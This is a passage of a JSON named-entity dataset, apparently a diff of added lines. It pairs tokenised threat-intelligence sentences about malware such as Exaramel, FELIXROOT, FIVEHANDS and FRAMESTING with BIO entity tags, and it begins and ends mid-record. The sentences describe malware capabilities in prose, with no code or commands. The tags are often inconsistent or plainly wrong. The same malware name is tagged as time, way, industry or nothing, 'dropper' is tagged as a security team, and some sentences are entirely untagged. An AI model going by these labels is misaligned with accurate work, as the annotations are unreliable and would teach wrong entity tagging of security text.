"ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "EvilGrab", + "has", + "the", + "capability", + "to", + "capture", + "video", + "from", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "has", + "a", + "hardcoded", + "location", + "that", + "it", + "uses", + "to", + "achieve", + "persistence", + "if", + "the", + "startup", + "system", + "is", + "Upstart", + "or", + "System", + "V", + "and", + "it", + "is", + "running", + "as", + "root." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "uses", + "crontab", + "for", + "persistence", + "if", + "it", + "does", + "not", + "have", + "root", + "privileges." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "can", + "decrypt", + "its", + "configuration", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "uses", + "RC4", + "for", + "encrypting", + "the", + "configuration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "can", + "attempt", + "to", + "find", + "a", + "new", + "C2", + "server", + "if", + "it", + "receives", + "an", + "error." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "can", + "uninstall", + "its", + "persistence", + "mechanism", + "and", + "delete", + "its", + "configuration", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "has", + "a", + "command", + "to", + "download", + "a", + "file", + "from", + "and", + "to", + "a", + "remote", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "can", + "execute", + "commands", + "with", + "high", + "privileges", + "via", + "a", + "specific", + "binary", + "with", + "setuid", + "functionality." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "can", + "run", + "<code>whoami</code>", + "to", + "identify", + "the", + "system", + "owner." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "has", + "a", + "hardcoded", + "location", + "under", + "systemd", + "that", + "it", + "uses", + "to", + "achieve", + "persistence", + "if", + "it", + "is", + "running", + "as", + "root." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "has", + "a", + "command", + "to", + "execute", + "a", + "shell", + "command", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Linux", + "uses", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Windows", + "automatically", + "encrypts", + "files", + "before", + "sending", + "them", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Windows", + "stores", + "the", + "backdoor's", + "configuration", + "in", + "the", + "Registry", + "in", + "XML", + "format." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Windows", + "specifies", + "a", + "path", + "to", + "store", + "files", + "scheduled", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Exaramel", + "for", + "Windows", + "dropper", + "creates", + "and", + "starts", + "a", + "Windows", + "service", + "named", + "wsmprovav", + "with", + "the", + "description", + "“Windows", + "Check", + "AV”", + "in", + "an", + "apparent", + "attempt", + "to", + "masquerade", + "as", + "a", + "legitimate", + "service." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Windows", + "adds", + "the", + "configuration", + "to", + "the", + "Registry", + "in", + "XML", + "format." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Windows", + "has", + "a", + "command", + "to", + "execute", + "VBS", + "scripts", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exaramel", + "for", + "Windows", + "has", + "a", + "command", + "to", + "launch", + "a", + "remote", + "shell", + "and", + "executes", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Exaramel", + "for", + "Windows", + "dropper", + "creates", + "and", + "starts", + "a", + "Windows", + "service", + "named", + "wsmprovav", + "with", + "the", + "description", + "“Windows", + "Check", + "AV.”" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "I-SamFile", + "B-SecTeam", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Expand", + "can", + "be", + "used", + "to", + "decompress", + "a", + "local", + "or", + "remote", + "CAB", + "file", + "into", + "an", + "executable." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Expand", + "can", + "be", + "used", + "to", + "download", + "or", + "upload", + "a", + "file", + "over", + "a", + "network", + "share." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Expand", + "can", + "be", + "used", + "to", + "download", + "or", + "copy", + "a", + "file", + "into", + "an", + "alternate", + "data", + "stream." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Explosive", + "has", + "a", + "function", + "to", + "use", + "the", + "OpenClipboard", + "wrapper." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Explosive", + "can", + "scan", + "all", + ".exe", + "files", + "located", + "in", + "the", + "USB", + "drive." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Explosive", + "has", + "commonly", + "set", + "file", + "and", + "path", + "attributes", + "to", + "hidden." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Explosive", + "has", + "a", + "function", + "to", + "download", + "a", + "file", + "to", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Explosive", + "has", + "leveraged", + "its", + "keylogging", + "capabilities", + "to", + "gain", + "access", + "to", + "administrator", + "accounts", + "on", + "target", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Explosive", + "has", + "a", + "function", + "to", + "write", + "itself", + "to", + "Registry", + "values." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Explosive", + "has", + "a", + "function", + "to", + "call", + "the", + "OpenClipboard", + "wrapper." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Explosive", + "has", + "encrypted", + "communications", + "with", + "the", + "RC4", + "method." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Explosive", + "has", + "collected", + "the", + "computer", + "name", + "from", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Explosive", + "has", + "collected", + "the", + "MAC", + "address", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Explosive", + "has", + "collected", + "the", + "username", + "from", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Explosive", + "has", + "used", + "HTTP", + "for", + "communication." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "FALLCHILL", + "can", + "delete", + "malware", + "and", + "associated", + "artifacts", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FALLCHILL", + "can", + "search", + "files", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FALLCHILL", + "uses", + "fake", + "Transport", + "Layer", + "Security", + "(TLS)", + "to", + "communicate", + "with", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FALLCHILL", + "encrypts", + "C2", + "data", + "with", + "RC4", + "encryption." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "B-Features", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FALLCHILL", + "can", + "collect", + "operating", + "system", + "(OS)", + "version", + "information,", + "processor", + "information,", + "system", + "name,", + "and", + "information", + "about", + "installed", + "disks", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FALLCHILL", + "collects", + "MAC", + "address", + "and", + "local", + "IP", + "address", + "information", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FALLCHILL", + "can", + "modify", + "file", + "or", + "directory", + "timestamps." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FALLCHILL", + "has", + "been", + "installed", + "as", + "a", + "Windows", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "encrypts", + "collected", + "data", + "with", + "AES", + "and", + "Base64", + "and", + "then", + "sends", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "encrypts", + "strings", + "in", + "the", + "backdoor", + "using", + "a", + "custom", + "XOR", + "algorithm." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "deletes", + "the", + ".LNK", + "file", + "from", + "the", + "startup", + "directory", + "as", + "well", + "as", + "the", + "dropper", + "components." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "downloads", + "and", + "uploads", + "files", + "to", + "and", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "deletes", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open</code>." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "FELIXROOT", + "collects", + "a", + "list", + "of", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "queries", + "the", + "Registry", + "for", + "specific", + "keys", + "for", + "potential", + "privilege", + "escalation", + "and", + "proxy", + "information.", + "FELIXROOT", + "has", + "also", + "used", + "WMI", + "to", + "query", + "the", + "Windows", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "adds", + "a", + "shortcut", + "file", + "to", + "the", + "startup", + "folder", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "uses", + "Rundll32", + "for", + "executing", + "the", + "dropper", + "program." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "checks", + "for", + "installed", + "security", + "software", + "like", + "antivirus", + "and", + "firewall." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "FELIXROOT", + "creates", + "a", + ".LNK", + "file", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "collects", + "the", + "victim’s", + "computer", + "name,", + "processor", + "architecture,", + "OS", + "version,", + "volume", + "serial", + "number,", + "and", + "system", + "type." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "collects", + "information", + "about", + "the", + "network", + "including", + "the", + "IP", + "address", + "and", + "DHCP", + "server." + ], + "ner_tags": [ + "B-Idus", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "collects", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "gathers", + "the", + "time", + "zone", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "uses", + "HTTP", + "and", + "HTTPS", + "to", + "communicate", + "with", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "executes", + "batch", + "scripts", + "on", + "the", + "victim’s", + "machine,", + "and", + "can", + "launch", + "a", + "reverse", + "shell", + "for", + "command", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FELIXROOT", + "uses", + "WMI", + "to", + "query", + "the", + "Windows", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIVEHANDS", + "can", + "receive", + "a", + "command", + "line", + "argument", + "to", + "limit", + "file", + "encryption", + "to", + "specified", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIVEHANDS", + "can", + "use", + "an", + "embedded", + "NTRU", + "public", + "key", + "to", + "encrypt", + "data", + "for", + "ransom." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIVEHANDS", + "has", + "the", + "ability", + "to", + "decrypt", + "its", + "payload", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "FIVEHANDS", + "payload", + "is", + "encrypted", + "with", + "AES-128." + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "FIVEHANDS", + "has", + "the", + "ability", + "to", + "enumerate", + "files", + "on", + "a", + "compromised", + "host", + "in", + "order", + "to", + "encrypt", + "files", + "with", + "specific", + "extensions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIVEHANDS", + "has", + "the", + "ability", + "to", + "delete", + "volume", + "shadow", + "copies", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIVEHANDS", + "can", + "enumerate", + "network", + "shares", + "and", + "mounted", + "drives", + "on", + "a", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FIVEHANDS", + "can", + "use", + "WMI", + "to", + "delete", + "files", + "on", + "a", + "target", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FLASHFLOOD", + "employs", + "the", + "same", + "encoding", + "scheme", + "as", + "SPACESHIP", + "for", + "data", + "it", + "stages.", + "Data", + "is", + "compressed", + "with", + "zlib,", + "and", + "bytes", + "are", + "rotated", + "four", + "times", + "before", + "being", + "XOR'ed", + "with", + "0x23." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FLASHFLOOD", + "searches", + "for", + "interesting", + "files", + "(either", + "a", + "default", + "or", + "customized", + "set", + "of", + "file", + "extensions)", + "on", + "the", + "local", + "system.", + "FLASHFLOOD", + "will", + "scan", + "the", + "My", + "Recent", + "Documents,", + "Desktop,", + "Temporary", + "Internet", + "Files,", + "and", + "TEMP", + "directories.", + "FLASHFLOOD", + "also", + "collects", + "information", + "stored", + "in", + "the", + "Windows", + "Address", + "Book." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FLASHFLOOD", + "searches", + "for", + "interesting", + "files", + "(either", + "a", + "default", + "or", + "customized", + "set", + "of", + "file", + "extensions)", + "on", + "removable", + "media", + "and", + "copies", + "them", + "to", + "a", + "staging", + "area.", + "The", + "default", + "file", + "types", + "copied", + "would", + "include", + "data", + "copied", + "to", + "the", + "drive", + "by", + "SPACESHIP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "FLASHFLOOD", + "searches", + "for", + "interesting", + "files", + "(either", + "a", + "default", + "or", + "customized", + "set", + "of", + "file", + "extensions)", + "on", + "the", + "local", + "system", + "and", + "removable", + "media." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FLASHFLOOD", + "stages", + "data", + "it", + "copies", + "from", + "the", + "local", + "system", + "or", + "removable", + "drives", + "in", + "the", + "\"%WINDIR%\\$NtUninstallKB885884$\\\"", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FLASHFLOOD", + "achieves", + "persistence", + "by", + "making", + "an", + "entry", + "in", + "the", + "Registry's", + "Run", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FLIPSIDE", + "uses", + "RDP", + "to", + "tunnel", + "traffic", + "from", + "a", + "victim", + "environment." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FRAMESTING", + "can", + "embed", + "itself", + "in", + "the", + "CAV", + "Python", + "package", + "of", + "an", + "Ivanti", + "Connect", + "Secure", + "VPN", + "located", + "in", + "`/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py.`" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FRAMESTING", + "can", + "send", + "and", + "receive", + "zlib", + "compressed", + "data", + "within", + "`POST`", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FRAMESTING", + "can", + "decompress", + "data", + "received", + "within", + "`POST`", + "requests." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FRAMESTING", + "uses", + "a", + "cookie", + "named", + "`DSID`", + "to", + "mimic", + "the", + "name", + "of", + "a", + "cookie", + "used", + "by", + "Ivanti", + "Connect", + "Secure", + "appliances", + "for", + "maintaining", + "VPN", + "sessions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "I-SecTeam", + "I-SecTeam", + "I-SecTeam", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "FRAMESTING", + "is", + "a", + "Python", + "web", + "shell", + "that", + "can", + "embed", + "in", + "the", + "Ivanti", + "Connect", + "Secure", + "CAV", + "Python", + "package." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FRAMESTING", + "can", + "retrieve", + "C2", + "commands", + "from", + "values", + "stored", + "in", + "the", + "`DSID`", + "cookie", + "from", + "the", + "current", + "HTTP", + "request", + "or", + "from", + "decompressed", + "zlib", + "data", + "within", + "the", + "request's", + "`POST`", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FRAMESTING", + "is", + "a", + "web", + "shell", + "capable", + "of", + "enabling", + "arbitrary", + "command", + "execution", + "on", + "compromised", + "Ivanti", + "Connect", + "Secure", + "VPNs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FYAnti", + "has", + "the", + "ability", + "to", + "decrypt", + "an", + "embedded", + ".NET", + "module." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "FYAnti", + "can", + "search", + "the", + "<code>C:\\Windows\\Microsoft.NET\\</code>", + "directory", + "for", + "files", + "of", + "a", + "specified", + "size." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FYAnti", + "can", + "download", + "additional", + "payloads", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FYAnti", + "has", + "used", + "ConfuserEx", + "to", + "pack", + "its", + ".NET", + "module." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-SamFile" + ] + }, + { + "tokens": [ + "FakeM", + "contains", + "a", + "keylogger", + "module." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Some", + "variants", + "of", + "FakeM", + "use", + "SSL", + "to", + "communicate", + "with", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FakeM", + "C2", + "traffic", + "attempts", + "to", + "evade", + "detection", + "by", + "resembling", + "data", + "generated", + "by", + "legitimate", + "messenger", + "applications,", + "such", + "as", + "MSN", + "and", + "Yahoo!", + "messengers.", + "Additionally,", + "some", + "variants", + "of", + "FakeM", + "use", + "modified", + "SSL", + "code", + "for", + "communications", + "back", + "to", + "C2", + "servers,", + "making", + "SSL", + "decryption", + "ineffective." + ], + "ner_tags": [ + "B-Way", + "B-OffAct", + 